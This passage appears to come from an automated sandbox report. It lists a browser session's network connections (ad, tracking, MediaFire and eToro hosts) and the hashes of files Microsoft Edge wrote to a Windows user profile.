| GB | 95.101.143.210:443 | www.bing.com | udp |
| US | 104.17.151.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| AE | 172.217.21.35:443 | csi.gstatic.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| DE | 91.228.74.244:443 | secure.quantserve.com | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| GB | 23.192.17.43:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| DE | 18.66.102.121:443 | rules.quantcount.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 65.9.66.97:443 | tags.crwdcntrl.net | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | c7f90fc2d24e915789c2980da055ac44.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | c7f90fc2d24e915789c2980da055ac44.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | connectid.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.prod.uidapi.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| US | 8.8.8.8:53 | invstatic101.creativecdn.com | udp |
| DE | 216.58.206.65:443 | c7f90fc2d24e915789c2980da055ac44.safeframe.googlesyndication.com | udp |
| DE | 216.58.206.65:443 | c7f90fc2d24e915789c2980da055ac44.safeframe.googlesyndication.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| DE | 142.250.186.163:443 | www.google.co.uk | udp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| DE | 18.66.102.21:443 | connectid.analytics.yahoo.com | tcp |
| GB | 18.165.159.204:443 | cdn.prod.uidapi.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| DE | 172.217.18.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | cdn-ima.33across.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | oa.openxcdn.net | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 8.8.8.8:53 | esp.rtbhouse.com | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 35.190.39.111:443 | esp.rtbhouse.com | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| DE | 141.95.98.65:443 | id5-sync.com | tcp |
| GB | 87.248.114.11:443 | ups.analytics.yahoo.com | tcp |
| DE | 65.9.66.97:443 | tags.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | oajs.openx.net | udp |
| US | 34.120.107.143:443 | oajs.openx.net | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | tcp |
| US | 34.120.107.143:443 | oajs.openx.net | udp |
| US | 8.8.8.8:53 | cdn.ampproject.org | udp |
| US | 8.8.8.8:53 | google-bidout-d.openx.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| US | 35.244.159.8:443 | google-bidout-d.openx.net | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 172.217.16.129:443 | cdn.ampproject.org | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | tcp |
| DE | 141.95.98.65:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| DE | 162.19.138.83:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| DE | 172.217.23.106:443 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lbs.eu-1-id5-sync.com | udp |
| DE | 162.19.138.83:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 142.250.186.33:443 | ep2.adtrafficquality.google | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | udp |
| DE | 142.250.184.193:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| AE | 172.217.21.35:443 | csi.gstatic.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| AE | 172.217.21.35:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| DE | 172.217.18.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| NL | 185.235.87.96:443 | ag.gbc.criteo.com | tcp |
| DE | 172.217.18.2:443 | googleads.g.doubleclick.net | udp |
| NL | 185.235.87.197:443 | gem.gbc.criteo.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| NL | 185.235.87.96:443 | ag.gbc.criteo.com | tcp |
| NL | 185.235.87.197:443 | gem.gbc.criteo.com | tcp |
| DE | 172.217.18.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 104.26.8.66:443 | econventa.com | udp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 8.8.8.8:53 | download1339.mediafire.com | udp |
| US | 104.26.8.66:443 | econventa.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 205.196.123.27:443 | download1339.mediafire.com | tcp |
| US | 104.26.8.66:443 | econventa.com | udp |
| US | 8.8.8.8:53 | ww3.qktrackapp.com | udp |
| US | 8.8.8.8:53 | ww3.qktrackapp.com | udp |
| GB | 54.230.10.3:443 | ww3.qktrackapp.com | tcp |
| GB | 54.230.10.3:443 | ww3.qktrackapp.com | tcp |
| GB | 54.230.10.3:443 | ww3.qktrackapp.com | tcp |
| US | 8.8.8.8:53 | go.etoro.com | udp |
| US | 8.8.8.8:53 | go.etoro.com | udp |
| GB | 23.214.118.122:443 | go.etoro.com | tcp |
| GB | 23.214.118.122:443 | go.etoro.com | tcp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | marketing.etorostatic.com | udp |
| US | 8.8.8.8:53 | etoro-cdn.etorostatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| GB | 2.22.96.95:443 | etoro-cdn.etorostatic.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | dd-js.etoro.com | udp |
| US | 8.8.8.8:53 | dd-js.etoro.com | udp |
| DE | 143.204.98.104:443 | dd-js.etoro.com | tcp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| DE | 143.204.98.104:443 | dd-js.etoro.com | tcp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 104.18.86.42:443 | cdn.cookielaw.org | tcp |
| DE | 142.250.186.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | dc.services.visualstudio.com | udp |
| US | 8.8.8.8:53 | dc.services.visualstudio.com | udp |
| NL | 20.50.88.244:443 | dc.services.visualstudio.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| DE | 142.250.185.131:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | tcp |
| DE | 142.250.186.36:443 | www.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | eec55fe349980566b1dbf1d409d28c3e |
| SHA1 | 654ce4b550defea0851f12e8ff81ae9298bb3f60 |
| SHA256 | 2e81ea3d7ddfc0274f3955d5131143c481e63f2529514c5295873b393d508efe |
| SHA512 | 58e02658d08732b5f36e868331a483b5fde15475a6c5f704a19c97d920399c3f7d41a8fa163c66683bf403598f8f48f0cf9fa468f9783fcabd9136a55cec0059 |
\??\pipe\crashpad_4436_EBSDCQHSVRITFWLC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2fbf45f98135be6e393ad17dec464708 |
| SHA1 | 6f157e2ea075c94a424c1e927cf93e70045f45c6 |
| SHA256 | a59f14c9cc883be4f81e1dccf2f0a016fbcbfb74864b2eac6e2048d4f0fbc529 |
| SHA512 | e3e05d2e9d2988b73a98d813e23f6d19331e41e4c233eb25ff6d77159762df36f9b4a1b244a8538016360e1e8be004d20315f919e0afefa5fa8b2faf17c3f96e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c2d5c41ce7ec526dc856e4251dd1e93d |
| SHA1 | b731c1cc2d0a7f8d61fc75075d1c666c578a25fe |
| SHA256 | 35309901475f1f2f5b167911df273331c1f001c407981bd39d4c77824912a10b |
| SHA512 | 380fd4dbe2c5bf519bff2a3090495b13904725c7a32b7e6699ca55fa88bba7a1ef4fda94f9086de29c7cb1119b094187ff7aa87965d0b23c60650a5ede08519f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5a7e1750438748bd333b79a94ca69b2a |
| SHA1 | 94fd1be56969e269ce195ba29c3d464d356d6556 |
| SHA256 | 6d7a64a318c25c643323d5cf1c0c80ccf2f2433e7d74b722fca90468f8f9b914 |
| SHA512 | 842509c0f495ee24d152ab3f7867183d7cd64b01b5a9305405682abbbff3aa18a8ad7d97ee039393fdd1766fc17ad2df1caf711dc4db8dc7b9df608ffc0fdc7e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | 164a788f50529fc93a6077e50675c617 |
| SHA1 | c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48 |
| SHA256 | b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17 |
| SHA512 | ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 3788b5a0a4969d1b84c367bd6b45c5ea |
| SHA1 | 050151ef238d8011b8b9b06971fead21df62dfaa |
| SHA256 | 83016e0b4cc9d49c14700b9b655e25a30afd927f66b10dcc1cf882de7a006667 |
| SHA512 | 39895781f2790a8bd0c8ea827f4affe49caace3991a51fdabce4f2a5b0d8206f1989d22120de33636a6c5f963f78d179abfcb633250a21c31b83b2c7b75f43e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 577b3782ef96fea6a28d1d04d4c45a8a |
| SHA1 | acb2f11697d6ff8f0db3601d5cb37cd8d17b5dd1 |
| SHA256 | ed46a385fcaa787ae56c51fef627e24eaef4ca5e7ee011ab26dacf7d3222b281 |
| SHA512 | bb31e1adea442e1696dfdc8023a611535137eed5679dc2438d8219364aa7cd62e13a46a39f4388b7fb78eee36d6fbbe37786f2c6f4c75c8d8c26cc7f6939a88d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4436_1133033926\8d3b3995-032b-419c-9335-9c311a459ca6.tmp
| MD5 | b0917d8e6c5b6be358bff67f84eb8336 |
| SHA1 | a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d |
| SHA256 | dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60 |
| SHA512 | cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451 |
C:\Users\Admin\AppData\Local\Temp\09c00bdd-6796-4395-ac82-44f1166e9145.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Temp\601f1562-e137-44fd-8e02-67e3ef2f0f25.tmp
| MD5 | 78e47dda17341bed7be45dccfd89ac87 |
| SHA1 | 1afde30e46997452d11e4a2adbbf35cce7a1404f |
| SHA256 | 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550 |
| SHA512 | 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js
| MD5 | 3d20584f7f6c8eac79e17cca4207fb79 |
| SHA1 | 3c16dcc27ae52431c8cdd92fbaab0341524d3092 |
| SHA256 | 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643 |
| SHA512 | 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist
| MD5 | d57316a5fdde78663db40c63ffefd92d |
| SHA1 | b66c673cc5b7255a1cd96526bf230e1e5cf5b6e2 |
| SHA256 | 8dccfa3be3d3c4e8cdd0c42b6df2663badc6f530531d194aaefd46b6e4dccd5f |
| SHA512 | 284538dff0d8f3e30a0fa747b644b80309d30eea729b7810ba215f378c816d299c5653e81db324e476794db643c529aa6780d4c1bf303306c6ba67e4b6362ddc |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4436_1133033926\CRX_INSTALL\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4436_1133033926\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\_locales\en_US\messages.json
| MD5 | 578215fbb8c12cb7e6cd73fbd16ec994 |
| SHA1 | 9471d71fa6d82ce1863b74e24237ad4fd9477187 |
| SHA256 | 102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1 |
| SHA512 | e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\manifest.json
| MD5 | d7f153bc1705e465c201f5ba53bd25ab |
| SHA1 | 055f9a40028bbf43f9ef36355e41b666d505716e |
| SHA256 | 15fc4a643e54ecb6b4ccacf11b14b314ccbdd534204bea8a46c5886627d224fa |
| SHA512 | b782fe9bd5bfdf9dd63b722aa1a84d14d49116faccda91e38973318e4b958554de891c4404d5d86ac9cf9307ac5e61638080f95a7ebf00ce1c762815b9f04bc1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6bbe6caeacc480600e505611a46a57ae |
| SHA1 | 8df9abe4230b4925824521f8e0e06f397c19e4a7 |
| SHA256 | b28933bb33599c3c32642b9e1e7602ab83d0a12a61cc7ad3923b548031abb8a3 |
| SHA512 | 1b85ec7b5b7d4ff1047f701ca6320c70e205a8b3d4d702060965dfc00b239e3ab9307fed77db4e981ceed123493530292b6a94cc3af8b15d9b088db15a6c25f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 9f8678a315350d88f1921e4a5111f13e |
| SHA1 | 4888ccec1413c2472c4cc32000dfd552f0804c61 |
| SHA256 | 1235b8ee5e786c3b87befd25245a293b5731f94961a56ffac3aa6c29c2bb3707 |
| SHA512 | 9e7ba8543070ff962c76fe4d248848b54adb21c31218cc67c6dcb6ba0663d787b74bd0bc07c1589b54df4002d296b2a75ab958d104abc5789b973f888372e9a0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 80b19c505c7e5c9cb8db301e09cf286f |
| SHA1 | 42f96f618dc4c5bcdb32170f6f4504c3e50e880e |
| SHA256 | e7ca3cd1d8dcf44e61bc87422921c6533457868adb7aa9efc7f9e22ed8b591d2 |
| SHA512 | c93fbe2fad0a13fa794ecbec6339f1f51ac931e380fb9fd7e6a2acbd9eef53719dad5ad3611bd820596d8540884348a98c56f012948631c5b7fcac8b28dc2737 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2b5dd617bc51c4c1ccb00b32b7a551cb |
| SHA1 | 7d736ba05663d721e586cb765fdbd30b8c95f5ae |
| SHA256 | cace12b31caef21a04e9b72cdaded7f3dab5d6e633385a91bb370c92f8eb1b69 |
| SHA512 | 6892aa73a27cd9b85f3361a933c7e47572df7d13e21ab914b37f715deee1e8d7341f1bcc4a9a17daa1d1fbef44ddfd3bfc0ae2d8d8e3b8802f0dd9ab56bff98b |
